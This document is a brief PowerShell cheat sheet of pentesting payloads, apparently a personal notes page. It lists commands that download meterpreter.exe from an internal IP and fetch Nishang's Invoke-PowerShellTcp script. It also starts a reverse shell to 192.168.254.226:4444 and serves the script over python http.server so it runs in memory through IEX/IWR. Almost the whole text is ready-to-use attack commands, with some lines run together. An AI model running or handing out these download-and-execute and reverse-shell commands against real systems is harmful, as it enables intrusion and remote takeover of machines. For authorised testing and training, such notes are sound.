Powershell Payloads
Reverse shells and enumeration scripts
cURL
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $PathReverse Shell
curl https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 > rev.ps1Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444python3 -m http.server powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))Projects
HackTricks
Nishang
Powersploit
Last updated